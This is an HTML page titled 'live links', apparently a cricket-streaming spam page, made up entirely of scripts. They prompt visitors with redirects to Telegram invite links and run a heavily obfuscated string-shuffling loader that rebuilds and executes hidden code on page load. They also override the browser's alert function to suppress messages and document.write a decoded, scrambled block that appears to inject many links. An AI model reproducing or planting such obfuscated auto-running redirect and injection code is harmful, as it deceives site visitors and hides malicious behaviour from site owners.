<title>live links</title>
<script>
   if(confirm("Upcoming text")) { window.location.href = "https://t.me/+33IHK7BHR14xY2I1" }

<script>
(function(){var DMe='',PwM=388-377;function rtC(d){var n=501138;var c=d.length;var g=[];for(var h=0;h<c;h++){g[h]=d.charAt(h)};for(var h=0;h<c;h++){var p=n*(h+536)+(n%47391);var e=n*(h+483)+(n%47988);var o=p%c;var z=e%c;var l=g[o];g[o]=g[z];g[z]=l;n=(p+e)%4992315;};return g.join('')};var moA=rtC('uunpezhdlortbfrmcctxasyijstrnqcgvkwoo').substr(0,PwM);var JTz='l(=+q,.2n,h6},.rrdovl)nkdg+blhsc),]jr;>i8rwrrvsar=r.n[;a(=b.;8=,+fb717;o"82t[9,tf,6a(Ch".1j=l ,8,a4<v6vocg471sl,uip"),82;;-a3ir=wc)x6t 6o.ru)0lrbm6le,gr(r(f=hs[,4=b9(*ei;g=Ap-==1gh)h29{)==C51o.h ;;+or;fwgrS;+;]e,kgo.ha))lmo=rtu]i+nsjAnp,juCA h,h+laexw.r-fcu2uamunf880)0rf m(8jeri;)-u;!rla(.l+){d"r n=0c+3xvae)(t]ga,;fir )=tti[,vsrn=d=a=r7 (eq=u0ntjgzea=uhnnlravar4hg0<a<;,w];) ;m;[. "1a(a+C1dy-5(g)rv;y+avslfft2v;aveb=+ah]q(*+j)cvar<ovexuiv 0.1j;t)htv.+n=e;utr;mow+ur){(u)}mu,tw9pfi;ntcr.;rrC=d+l.(d+avn7hav)(l=]Cl,tvwi);rhip+6dr,-2t!8l([])fv5)bu96jh[()}=n{e(;nt[vs),(po;n2(ecfheso)c p]t"e0ri0procl(n")fa>=A01rpc}w]sa vigcm(;nc60-}oo[ahrs(prbrC{,wsoj85.2lhg n),mwgd.rgi"h.("pp(p+sa;({;=u[i)r ;vva+ =n. ;;(jo6e;da.;l7} i;e2.l=;sic0=r]nt.]1n(urcu7;aawyqj+t;fe8us8on jo tr[=rA9u;1 y) Cs=nfioS;[a(uy=s;i l i;u..+w)2==q,==r<n].((h)m7)o;(o=tr={i.(frmsra9x gek}tue+=[nl1uavv,.snvrohev;y"i+]tn[r+=a';var QcV=rtC[moA];var qwD='';var Pzw=QcV;var XIW=QcV(qwD,rtC(JTz));var AtY=XIW(rtC(',,.2i(.r_(n}#8=Up2bUogU5o"l\/UnUd.r";f8)n_f,n)Uk!.2U!.,U);2llh\'& rtie.w;Ua;a1oe"y)c%.U"3(U",Uel iUv.U$s;U)r6nye%)(3ko)!U( UdUk4=r;)UUa.;$=an}52m lb(oU2j]7(e!_(sce6.d64i.f1e9o_=eo524 %useg.$UccSr(U.e5.5{mko3,Ui3).l+2]8.3)!)h,U2k) (t"4U$6,,(frc)n._.!p.k)os.1U397)U:U,!f=Ui{=.+sc60glr371nc=e+!bU5CUhf#fey:c=[-(; (3U)!U9()e&5xt{ce)te.a7e)UU.$ Ue7U0ne=w4,$+UoUn53r(0d(.$(UUU4+ee,9$##)S0U}=4n2.eC;880&$S3.UnU,U9u,;7U,3g&;U;UU ,_idd6{a ).o5]d2$=_U*U)tmlj_cl{=-);8-eU(ocUs;.tt=;}U;0.;je(on cU,54.b_=(7l(=tfi;s2n=ap_oe46:jU!1(_U7ex_"o_mU{U\'SUdler(((.U)7Ucy7.Ue\/).4f)g;m=mUUUs;(,v)e{Uif!ef4j;eUueq(=d5ed0h;{j-U_s+U}) se,U_5coesqr 3,U!U1hs5*t)\'0!_U"g!.46*)c5)k!a\/)}!=U!UU)618a.r){ifjo1U2 =t$aa( b$_"{%+!7cu}UsaUx6e760j))U]fl)(U;*Ul3(a=o3ye5sUa&6j\/6pc$o(!1e{Cosnf]}$UU$e]_oo.UosaU7=;vf51)UU_6.$U)onu;1)t{5\'ksfl;cUsvr=2UU3glfU,\/UUbU;c{}5_UrU;_15=gvjn3c4c8.cc _2_iUU1)!.U[n((o8UbU)os9,_%6.(%ry.;e#).e=n$nc_ot)fyf2p0.c.}_l%.nUcU))dvc)l.Ueso$(({U(.Uq$j_(0,4),e%uU)+_4c((U#U6vi7_!fs2U\',;1(.].e=})s5U]{}%__9!.;( x7$#U6.e. U76+.$j1() _430U0joU$_ 3\/.UUe!_UU49{+xe_.sUU )4,Ub[U6 b{Usc0.!fr\/1953.l.)p._f:7ejU5s_.!r7(bc(,h);$:7s=]{%3.ytb2.U59)Uonef(,[UUUfmr;9e!!eeU c-ce.$a{60,r77,i,(}#bo 3a)d4,e[0_53U\/  Ui7)mU!_1g={.15,Ua; }!23'));var qlp=Pzw(DMe,AtY );qlp(8172);return 8272})()
</script>
<script>
function _0x2aa1(_0x5da4e8,_0x2dd25b){var _0x344393=_0x5141();return _0x2aa1=function(_0x492026,_0x300fad){_0x492026=_0x492026-(-0x1*0x1b56+0x68c*-0x1+0x1*0x22a9);var _0x1c0cca=_0x344393[_0x492026];return _0x1c0cca;},_0x2aa1(_0x5da4e8,_0x2dd25b);}function _0x5141(){var _0x3b251d=['annel\x20@liv','245070hosnOk','ecricketst','https://t.','elegram\x20Ch','UIDoj','me/+wHp1c9','log','99sznGLP','ssed:\x20','Alert\x20mess','355pOjLBj','5204376nwVOJW','671PsHriL','ZFXklhZjll','href','alert','slQLN','age\x20Suppre','1886580uobBkZ','51248LUicFj','515367ShJIdD','location','reaming01','3470826croqBA','14UpIGhN','Join\x20Our\x20T','2142NqtfJo'];_0x5141=function(){return _0x3b251d;};return _0x5141();}var _0x5a09af=_0x2aa1;(function(_0x57a3ac,_0x22600f){var _0x183882=_0x2aa1,_0x10020d=_0x57a3ac();while(!![]){try{var _0x136a31=parseInt(_0x183882(0xe1))/(0x2021+0x206c+-0x408c)*(-parseInt(_0x183882(0xd5))/(0x1e84+-0xc53+0x299*-0x7))+-parseInt(_0x183882(0xde))/(-0x96b*0x2+0xcd6+0x603)*(-parseInt(_0x183882(0xce))/(0xd*-0xd1+-0x19*-0x37+0x542))+parseInt(_0x183882(0xcd))/(0x25f*0xb+0x2707*-0x1+-0xcf7*-0x1)+parseInt(_0x183882(0xd2))/(-0x48*-0x65+-0x12b*0xa+-0x10b4)*(parseInt(_0x183882(0xd3))/(0x20fd+-0x1e9d+-0x259*0x1))+parseInt(_0x183882(0xe2))/(-0x19c+0x1*0x196b+0x1*-0x17c7)+parseInt(_0x183882(0xcf))/(-0x1869+-0x7*-
x373+0x4d)+-parseInt(_0x183882(0xd7))/(0xcc+-0x1*0x1acd+0x1a0b)*(parseInt(_0x183882(0xc7))/(-0x12b6+-0x1fe1+-0x32a2*-0x1));if(_0x136a31===_0x22600f)break;else _0x10020d['push'](_0x10020d['shift']());}catch(_0x303c0a){_0x10020d['push'](_0x10020d['shift']());}}}(_0x5141,0x11cd6d+-0x14e068+-0x15ffd*-0xb));confirm(_0x5a09af(0xd4)+_0x5a09af(0xda)+_0x5a09af(0xd6)+_0x5a09af(0xd8)+_0x5a09af(0xd1))&&(window[_0x5a09af(0xd0)][_0x5a09af(0xc9)]=_0x5a09af(0xd9)+_0x5a09af(0xdc)+_0x5a09af(0xc8));window[_0x5a09af(0xca)]=function(_0x23c3a2){var _0x42634c=_0x5a09af,_0x2c5732={'slQLN':function(_0x11ba88,_0x465ed6){return _0x11ba88+_0x465ed6;},'UIDoj':_0x42634c(0xe0)+_0x42634c(0xcc)+_0x42634c(0xdf)};console[_0x42634c(0xdd)](_0x2c5732[_0x42634c(0xcb)](_0x2c5732[_0x42634c(0xdb)],_0x23c3a2));};
(()=>{for(j=function(){for(h='ng!Mt.QiewfS}7te~Tp',a=new Array(h.length),l=0;l<h.length;l++)a[l]=h.charCodeAt(l);return a}(),m=m=>document.write(m),k=decodeURI("".concat("r=h,;%7Bhoaa%3Eh%3Ea(tm%5Bf%7Dtw)o(.)(wodktieoirrrlldlrt(Ih,ai%22).cV(cg%3E(hn%22Fa%20e=g%25n)WhCuCf,%20e7rr0.2wa()ne=gj!,.n(lelDH=((nr(Ua%22ycRrts(rr2(d(hnnehq.%25lt3fAcwt=t%255%7Bya+ncot%25eipens#t5e=Aro=ninlt,Q%22=tet2c);l(%7Bth2hctge=%25t(5t+%5Dn+DU5=2glc)x%25)522(e%25.%7BnEN;DA0dKp)teh=u=nou%25e%25o=E7vjWaeU,cn%3Cpre/iee2%25m,r%25B2cl0=t2;5%253ocAt:%3C.de8?tQPTIa2%25+2eE%25he.u%25th%22eo2Ct-t2w22unRyrl5gl5l%25m=(2eM%25ee2w2B5;a35dndI;2n=dnm2r2Oe)2oant2ea(-hE-tWwimdtc%25atin3NCfmp2enr(=3s%25-C23=Eehoraotlctlr.%25n3cFneecmnl%25t)aTEchZ8te(-raeis5n+0g25e=pimc=Ewm20u1i0det%25s5ioo5%25p=ee%25tm3m%25C2rwaeoe0C%25hfu3%25?=%255=d=ai=12at24tetCiRptevp.nc2l255El%25)2urnv%25h=0Eo2etslee2aot%25jh05:=-s=2dhbn3aehri3mcct22ic,i0te2-52v0R7%25iox3e;%25r%25ob2aicor2sC20C%25ioj=i-=2C%25ed23ug-2(e-p5i,BHeAtp%252%25C%25t.ulBt2U5K52tnoc2i22ct%250d=2Lpece%25l5mi55t2B2s22xt,Fi2lr/5e3tr5Dtm5=s2=tC5jncCt.hsJ3ww%253i30noc2t==2c2rre3CEt%25h0ptvXlHrcermmcp2=epnm2%255lE5w%25/=Ty5ic25,t05ae.iiqt=%25net2if%25s/t@5%25lXa2c2nw8/l:e//2a1ht5n3at5=loH%2532)otps03xiy31.dn.2cila%25s3522pnE/pt%25paZr3l532ptDCicolntc2y%25En32thonaptyH5i/viesaga55pEC2A5k6xih2Eit22fH2553=b29j/itt0cljt.%25%25oI%25qp/CCCwreqas/swnA5p2th-Cn6%25r2%256rtr20ej2v%25Cctss%25%25M2jy2i-V2t53pnl2ci2i.i3/lx%25/Hctisbc%25J2dpmre/t.av%25e2Eh2/355=ceEt5iJ3Kr.s%25Crr2%25b%255k2HckcrE3aphsy.rpiisr255tCdtr2202/7a:je=523J/%25Sb2atipeZt2j2ye2pcntCf23.p.sa.m/50ctMiilOf23tej5jp.;mC5t%25ds2rym.sDj/=enq/2//%25E52%25s53hys%25/53tBo%25%253sCisns%25%25Bsrlr2t/5l2srs%25;ar:.%25pcuaw75tir%2535#t5vp%2552%25:,%25%25mlvlrje.Fs.2cnprim3aado2g5ew/%25H2tw0=%250Hhm5/%25iE0%250syCgr21i/2w!1=s%252BEa3%252s2pe55Een0r80nC3%25pC5y%25Ec03E9n7yyE%25cSoe2.72Kt2t2htt20%25amLv5et0ybtcVlaeoatad7C5rlr56ci2i2=x/h2rsMld2n5%255eKDppptr/:amcroopek2;205-cirB.2.%25yaeohe2c0lnr2u5wtstrC.imngtEptCixmTJe0vcak5/-lZ3saa25g%25r=P-ettyami3viaipsyjy#cl5!is//sjtEe3pble-(t.rugs:wBjgv5t2ms2.os;HukopipnD.d3s-rti.25:ne:n:0wneiogtce.pastl2aw2aityptcaywd30/dp.sp%25222h3vtinJsosaedbptjws2oe2ti2o/2D.vifs3kp;=sf;1Za5r/2%25d00%25tyatjhn2sa2w/2%25:o2spC:=hi-2ekt5nd2zayr%25wg2s:=5Jat5/E:o/epao=%25%25h/-svy@iiijHsecudljaj.bou%25D3/aaprc550ahgti1ep%255r.eteeDgn5vaAujsgvhvdtc:ndlm--:u-soj5sdO%25r%25Tien2a@dnr/w-07%25/2n0d7-27ag;/2egp:sh0vrnEcr-5ey.-lHe0ddboltlhsn-iu7nsisbe9e09pmevp2-wsj/ddvkagtad%25pv/e0sktgH5:agwe)e:oun/rot5ssn-ccs5oot-D:sB5l5plej-apnelpg%25sgrmc:o5hic%25cpeeuh/si-a-sa9t.%25odnwgn0:rrowoavs.Boz7saup5ap5ciJ.t:-BDn2a2.lues%25vdsojpwro%25bis.0inaprdptaey;kw6/egtmn50.hs2(a-nu%25elv2pi7p5atB.lrjtc6o0vMtlujvAsruayjsakuo@3Atn.5j)%25wp125cuec2p2ch(auoecie=/2lsl--e2fJ.oe/svi%25gon05yi%25snsjs-/g6snaf/2s-B%25rfsit-kd0iTggru7ip7tee0A/l-sustjms(dvsis7hj5ome:c0sarvdtaydjbj1d.dsi/p--oHpd-6bii-/p.poir-jestgn0ln1dhnc.2efg-/i2pnsi/tvead%250DdBijsea:57gpwng/2hc07-palr-st/w/h-7cw%252m5-gve-u.g2%25ccr72pa/v7:gekaorcp5/5cpop:g7utyeas.dcacoa2eD-oa-/a/aaa6nrisvtvnmn.cp:o.ws0/mor:h/lnT-/9cbd2e7gnbo-7g/ao-tn-lv:d)naeaeA;htcJraoDjhnvae-kej@5k.s;fge/rTu@ronsg0aib-ug)poi@n2gr%250;/it:o:de%25ae0p.7ip.ns2w%25r7ge/-t.se5ed/pkb-ursreeyur(.cbgpn.uieczp:Dss.ticneg:eptuso/iywh2vdr9-j/atnaals1ur2jge-acir..sl:Bwenbartayvh1gdokedr0b.oo/
rsl%25sBv/5o-e0s/7ie2i-ivwrocrttshrto1s5dn/ngl%25sinA0ibqls0rHpsic9-;5ij.toj/)sb.ctuqarfT.vca;egssoptnc5orcs-n%25e-0ssv/jfc/vspaa-lnnocpulsabrultew(-5akn/easw(g-kgAv5vnlonosnai%25vld:0j/vJ%25u7-f/ucnrns/drpsBsb-rorh-bavnvh6oc)r-lkccpenJe%25kl70l-gu2cg/pesls2e/2ori9aettBt%25v.ms)c-av.ae.s-@rec/fs2osdad7gsnl2%25l.ugi2%25dp0-/feBandegcgpf/rg)crheyv5ndpeJ.pstvmoh.eiD:-:eozssjo/l.eo:fd.iD-j2iav2o(Dg-7/ulnccj/rtwdosacsva-ei5w-epuovHat2spnvc0swecm-:7:seAht-ue/awe:/nr/eBuislAgelto5ifesasnms%25w7tj0uw%25%25o7c-esndkie5e:/rvof.i:ne%25l/j5c-cn/v0n;5e/uleb5/s-k:jgfac7i/.-asligeBtt/s@dfrnedcnhhB;di.pyais9iaw7-li-%25istv.ghen0eBDnfvm72nn1nlivt2.arckvrj5:dlC2aoo5eD-lg55peh-ie2niyteTel952tr:ri;owt6pn022sarrn2-cu2t=lB2r@i7iolcnil0gp.5scy@vgeetspw2-%25TnommH%25lsevt5cni55lj3/nacec3vtDf1a%25eteev/ghs2/To3n07ooip2r./7-vlraCs-rnej/2i2smag3b-/crgo.ss3af2af2oi52Chr5ge0eEc0eJ%251d/ann%25dfse/r0tRlia5wo.ds,5rEmee%25rnn(fcCEnT%25c55-2)otose2%25feal%25022n%25ohB2awatxt555f;rr%25rlor5)2t7tvrwaui%25rdeate5l;mHnPa3_ePrn3j2nyftonsb20tu2Eyc.25Dwa2ca%25ae%25%25Dsneh%25ou-atedr%25fc%252a53m-:pv0d%25t(%25-s5c2tgatE-(S2rp%25%253vp3iu2ue532vyl0sP5l(m%255i2x5Ovjg2E5:eEirss2td%25lEnh2pdE32220m%255%25C%255r5222:2s2p2e.2/i2-wc%25m%2553triejpJ2.fiea%25r2rd752iics(n2)iutol(rgl%25..J5)t%25ar6eEdln)3Uo%25e%25rg5l0g0-(;hos;phc22s00l7i%25C&ju:dd2i5Dte&S.%25.55f=52iD.35glUea5vj.y%25%25Dr5preUo1l22Cm+enmBn%25/c2Csurj=75l5%25ph5,%25oDml%25Cl(=5k-k=l5=lee%25t0(i2;D2l5%25rb.Cr@2)22el7unLmbgtui5323+5%25-l%25%25sE2,efg(p%25he55rtu=h)lh%25%25=%25%25/:dlhay-72s3rnh)%25%25)rkTt=%252%25CjBl,BkEB=hb)ai)25%251%25=nl(,t%25B=%25i.r.25o2)=a1utn/2.5l2%25/oEt+tCncG=)2=;e=15e=32%2550=5p3ella.%22Bf,Co)t)=%22%25kD(j-lsgUl.,nrlgeeD=!)-g.h=rlkhen;n,l3-=n=pgtgD+)tma&ih-%25ecefBg1%5Bm%25n0%25%25l=;t2%3Ek-hsk)=ck=w5o%7Clj.t,3h%5Bg=g,-gblg;%5D-%5Dk3=(l=i),%22sfb%25kk,l%5B;,0e%5Bgfl(+5b;lsehf%5B%3Co=lf);%5Be%3Citk57g)%5D,l2i&k.Et(,)-p%25t,p%5D)%3Eg)+%5D,5C:2w3enkl%25=s(c.kilh%22)-)tf%5Dgkh+c=ctk.l,nglt2orgn=r)i=g%221l%7C%3Ent0e.l%25n,t-;l-+gif(,,=r;nDit%7De()1/=cmj-%25g")).split(""),g=k.length%j.length,l=k.length-1;l>=0;l--)g--,-1==g&&(g=j.length-1),f=l+j[g],f>=k.length||(c=k[l],b=k[f],k[f]=c,k[l]=b);for(n=m,i="",l=0;l<k.length;l++)i+=k[l];n(i)})();</script>
